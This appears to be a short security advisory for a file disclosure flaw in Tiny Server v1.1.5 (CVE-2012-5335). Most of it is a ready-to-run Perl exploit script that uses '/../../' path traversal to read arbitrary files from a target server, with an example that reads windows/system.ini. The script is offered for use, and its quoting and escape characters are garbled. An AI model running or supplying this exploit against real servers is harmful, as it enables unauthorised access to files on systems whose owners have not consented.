Tiny Server Arbitrary File Disclosure Vulnerability

Summary

Tiny Server v1.1.5 Arbitrary suffers from file disclosure vulnerability.

Credit:

The information has been provided by KaHPeSeSe.


Details

Vulnerable Systems:
 * Tiny Server v1.1.5

use LWP::Simple;
use LWP::UserAgent;

system(‘color’,’A’);
system(‘cls’);

print ‘nt____________________________________________________________________n’;
print ‘nt……. Tiny Server v1.1.5 Arbitrary File Disclosure Exploit …….n’;
print ‘nt……. Founded and Exploited by KaHPeSeSe …….n’;
print ‘nt____________________________________________________________________nn’;

if(@ARGV < 3)
{
print ‘[-] Error!n’;
print ‘[-] Look to examplenn’;
&help; exit();
}
sub help()
{
print ‘[+] How to : perl $0 IP Port Filen’;
print ‘[+] Example : perl $0 192.168.1.2 80 windows/system.inin’;
}
($TargetIP, $Port, $File) = @ARGV;
print(‘Connet to Server…. n’);
sleep(2);
$path=’/../../’;
my $link = ‘http://’ . $TargetIP . ‘:’ . $Port . $path . $File;
print(‘Connectedn’);
sleep(2);
print(‘Waiting for momentn’);
sleep(1);
print(‘Done! Reading $File…n’);
sleep(3);
$ourfile=get $link;
if($ourfile)
{
print(‘nn____________________________________________________nn’);
print(‘$ourfile nn’);
print(‘_____________________________________________________nn’);
}
else
{
print(‘_____________________________________________________nn’);
print(‘ Not Found !!!nn’);
print(‘_____________________________________________________nn’);
exit;
}

CVE Information:
2012-5335

Disclosure Timeline:
Published: 2012-03-16

Categories: News